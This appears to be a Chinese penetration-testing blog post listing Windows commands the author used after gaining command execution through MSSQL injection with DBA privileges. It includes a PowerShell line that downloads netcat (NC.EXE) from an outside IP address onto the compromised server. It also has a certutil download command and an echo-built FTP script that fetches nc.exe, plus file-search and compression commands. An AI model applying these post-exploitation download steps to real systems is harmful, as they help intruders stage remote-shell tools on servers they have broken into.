MSSQL的DBA注入的一些小操作

发表于 2017-12-11 | 分类于渗透测试， SQL注入， MSSQL高权限注入 | 浏览次

字数统计: 316 字 | 阅读时长 ≈ 2 分钟

搞了一晚上的mssql的dba注入，虽然没搞下来，但是收获颇深，总结一下小技巧

查看当前目录

echo %CD%  #C:/Windows/system32

常用的下载文件方法

certutil

certutil -urlcache -split -f https://www.baidu.com/img/bd_logo1.png D:\x.txt 自定义目录下载

powershell

1	powershell (new-object System.Net.WebClient).DownloadFile( 'http://47.95.206.199/NC.EXE','c:\Users\mssql$centersoft\desktop\nc.exe')

ftp

echo open 127.0.0.1 21> c:\Users\mssql$centersoft\desktop\ftp1.txt
echo xadmintony>> c:\Users\mssql$centersoft\desktop\ftp1.txt
echo y123456>> c:\Users\mssql$centersoft\desktop\ftp1.txt
echo lcd c:\Users\mssql$centersoft\desktop\>>c:\Users\mssql$centersoft\desktop\ftp1.txt
echo GET nc.exe>>c:\Users\mssql$centersoft\desktop\ftp1.txt
echo bye>>c:\Users\mssql$centersoft\desktop\ftp1.txt

其他方法移步：

https://www.t00ls.net/articles-37253.html 不写那么多了，其他的有点鸡肋

查看文件内容

more c:\a.txt

查找文件

dir \s \b xxx #在执行cmd的盘符查找(好像可以从内容中找)
dir c:\ \s \b xxx #在c盘查找
dir c:\ #显示c盘的内容
dir \s\b c:xxx.aspx #查找文件

win自带的压缩解压命令

压缩一个文件： 
makecab c:/file_name.txt c:/file_name.zip 

解压一个文件： 
expand c:/file_name.zip c:/file_name.txt

ps:必须用makcab压缩的才能用expand解压

本文作者： AdminTony
本文链接： http://www.admintony.com/MSSQL的DBA注入的一些小操作.html
版权声明： 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 3.0 许可协议。转载请注明出处！